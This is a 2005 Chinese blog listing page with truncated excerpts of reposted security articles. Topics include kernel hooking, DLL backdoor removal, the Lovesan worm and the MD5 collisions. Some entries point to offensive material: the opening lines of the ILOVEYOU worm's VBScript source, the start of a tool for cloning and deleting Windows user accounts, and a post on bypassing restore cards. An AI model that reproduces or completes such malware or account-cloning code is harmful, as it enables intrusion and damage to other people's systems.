- 博客(13)
- 收藏
- 关注
原创 [转载]内核级利用通用Hook函数方法检测进程
内核级利用通用Hook函数方法检测进程作者: LionD8QQ: 10415468Email: LionD8@126.comBlog: http://blog.csdn.net/LionD8 or http://liond8.126.com介绍通用Hook的一点思想: 在系统内核级中,MS的很多信息都没公开,包括函数的参数数目,每个参数的类型等。在系统内核中,访问了
2005-05-14 00:50:00 710
原创 [转载]克隆/删除任意用户(RingZ_CDUser)
作者:dahubaobao 来源:中国红客联盟 更新日期:2005-01-18 浏览次数: =====================================================================#include #include #include char name[50][30];int KeyN=0;//OpenKey(),View
2005-04-27 12:01:00 897
原创 [转载]XP服务的详细情况
控制面板→管理工具→服务;指着建议为“已停用”的服务属性改成“已禁用”并按停止即可;Alerter 微软: 通知选取的使用者及计算机系统管理警示。如果停止这个服务,使用系统管理警示的程序将不会收到通知。如果停用这个服务,所有依存于它的服务将无法启动。 补充: 一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts),除非你的计算机用在局域网络上 依存:
2005-04-26 21:37:00 692
原创 [转载]手动清除DLL后门(DLL backdoor)
后门!相信这个词语对您来说一定不会陌生,它的危害不然而欲,但随着人们的安全意识逐步增强,又加上杀毒软件的“大力支持”,使传统的后门无法在隐藏自己,任何稍微有点计算机知识的人,都知道“查端口”“看进程”,以便发现一些“蛛丝马迹”。所以,后门的编写者及时调整了思路,把目光放到了动态链接程序库上,也就是说,把后门做成DLL文件,然后由某一个EXE做为载体,或者使用Rundll32.exe来启动,这样就不
2005-04-26 21:26:00 968
原创 [转载]I love you(Source Code)
rem Originally submitted to Packet Storm as Win32DLL.txt rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,
2005-04-26 17:47:00 960
原创 [摘要]Windows 安全更新摘要(2005 年 4 月)
安全公告 MS05-016最高严重等级:重要更新编号:893086受影响的支持软件: •Windows 2000 Service Pack 3 (SP3) 和 SP4•Windows XP SP1 和 SP2•Windows XP 64-Bit Edition SP1 (Itanium)•Windows XP 64-Bit Edition 版本 2003 (Itanium)•Windows Ser
2005-04-24 02:00:00 713
原创 [转载]MD5和SHA-1被破解(计算机世界报)
如果说MD5和SHA-1是当今各种信息安全体系所依赖的大厦基石,那么现在,这些大厦的基础已经出现了很大的裂缝,甚至,有崩塌的危险。 全球学界震惊,美国军方网络在内的重大安全体系人人自危…… 在8个月以前,人们还以为在全球广泛应用的MD5和SHA-1都是值得信任的安全的数字签名算法;8个月后的今天,曾经值得信赖的数字签名体系,令人震惊的两次“碰撞”将这两种应用最广的签名加密算法都逼上
2005-04-24 01:45:00 1673 1
原创 [转载]3721驻留机制简单研究
[转载]3721的驻留机制简单研究Quaful@水木清华简单研究了一下3721的机制,写在这里,作为心得笔记吧。大部分收获都来自Softice + 反汇编,不一定适用于某些版本。1. CnsMin.dll的驻留方式3721的核心文件:CnsMin.dll通常存在于/Downloaded Program Files下。通过注册表Run键值加载:Rundll32 /CnsMin.dll, Rundll
2005-04-24 01:02:00 701
原创 [转载]穿透还原卡和还原软件
还原卡和还原软件被广泛运用于各种公共场合的电脑上,比如学校机房和网吧。这些还原卡和还原软件(以下我简称为虚拟还原技术)能够记录下一切对硬盘的写操作,不论您对硬盘进行拷贝还是移动删除甚至是格式化分区等操作,只要一重新启动,一切都会恢复到这个操作之前的情况,因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用,难道
2005-04-22 12:20:00 770
原创 [转载]全面了解telnet
一 摘要Telnet的应用不仅方便了我们进行远程登录,也给hacker们提供了又一种入侵手段和后门,但无论如何,在你尽情享受Telnet所带给你的便捷的同时,你是否真正的了解Telnet呢?二 远程登录Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么就让我们来认识一下远程登录。1 远程登陆的基本概念先来看看什么叫登录
2005-04-22 12:16:00 1612
原创 [转载]关于Lovesan蠕虫病毒
Lovesan的出现,给互连网立即带来了巨大的冲击,它能够向未安装上述补丁的系统发起攻击并迅速蔓延,还造成了一些系统的崩溃。 Worm.Win32.Lovesan用C语言编写,利用LCC编译,是Windows PE可执行文件,大小约为6KB(用UPX压缩工具,解压后为11KB)。在被感染的系统者,Lovesan会下载并运行名为blast.exe文件,该文件中有以下的文字:“I just want
2005-04-22 11:45:00 1030
原创 [转载]CPU指令基本概念
CPU 最常做的指令,就是设定数值,例如设定某个缓存器、某个地址的内存的数值。以下例子示范如何把缓存器 AX 的值设为 9:首先执行 DEBUG,在地址 100h 处输入组语 MOV AX, 9 的指令:C:/>debug-A1001358:0100 MOV AX,91358:0103-用 DEBUG 的 R 指令,显示「缓存器」(Register) 的值: -RAX=0000 BX=0000 C
2005-04-19 23:16:00 1159
原创 [转载]彻底了解Cookies在网络中的应用
Cookies现在经常被大家提到,那么到底什么是Cookies,它有什么作用呢?Cookies是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。Cookies是当你浏览某网站时,由Web服务器置于你硬盘上的一个非常小的文本文件,它可以记录你的用户ID、密码、浏览过的网页、停留的时间等信息。 当你再次来到该网站时,网站通过读取Cookies,得知你的
2005-04-18 23:00:00 698
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人